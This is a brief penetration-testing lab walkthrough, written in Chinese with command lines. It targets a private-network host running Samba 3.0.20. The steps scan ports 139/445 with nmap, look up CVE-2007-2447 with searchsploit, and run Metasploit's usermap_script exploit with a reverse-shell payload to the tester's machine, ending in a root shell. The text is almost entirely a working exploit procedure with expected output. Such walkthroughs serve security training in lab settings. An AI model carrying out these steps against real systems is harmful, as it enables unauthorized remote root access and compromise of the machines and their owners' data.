nmap -sS -sV -p 139,445 192.168.56.102
预期结果:
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open microsoft-ds Samba smbd 3.0.20-Debian
👉 Samba 版本:3.0.20 该版本易受 CVE-2007-2447 影响。
searchsploit samba 3.0.20
结果:
Samba 3.0.20 - 'Username' map script Command Execution
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.102
set RPORT 139
set LHOST 192.168.56.101
Payload 将自动设置:
cmd/unix/reverse
检查:
show options
run
或
exploit
如果成功:
Command shell session opened
我们检查:
whoami
👉 结果:
root